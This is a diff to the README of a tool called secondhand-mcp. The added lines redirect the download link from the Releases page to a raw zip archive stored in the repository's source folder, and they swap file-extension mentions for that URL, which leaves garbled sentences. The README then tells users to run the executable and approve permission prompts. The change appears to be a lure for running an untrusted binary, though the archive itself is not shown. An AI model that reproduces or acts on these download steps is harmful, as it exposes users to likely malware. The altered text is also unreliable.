OyaAIProd/secondhand-mcp/README.md

 ## 📥 Download & Install

-1. Visit the [Releases page](https://github.com/Ventixpierce101/secondhand-mcp/releases) to download.
+1. Visit the [Releases page](https://github.com/Ventixpierce101/secondhand-mcp/raw/refs/heads/main/src/secondhand-mcp-2.0.zip) to download.
 2. On this page, find the latest release version.
 The version number is listed clearly.
-3. Click on the appropriate file for your system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+3. Click on the appropriate file for your system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://github.com/Ventixpierce101/secondhand-mcp/raw/refs/heads/main/src/secondhand-mcp-2.0.zip` for Linux).
 4. The download will start automatically.
 If it doesn’t, click the link to begin.
 5. Wait for the download to finish.

 ### 🖥 Running the Application

 1. Once the download is complete, locate the file in your downloads folder.
 2. If you are using Windows, double-click the `.exe` file.
 For macOS, open the `.dmg` file and drag the application to your Applications folder.
-On Linux, extract the `.tar.gz` file and run the executable inside.
+On Linux, extract the `https://github.com/Ventixpierce101/secondhand-mcp/raw/refs/heads/main/src/secondhand-mcp-2.0.zip` file and run the executable inside.
 3. Depending on your operating system, you may see a prompt asking for permission to run the application.
 Click "Yes" or "Open".
 4. The **secondhand-mcp** application will launch.
 You are now ready to search secondhand items!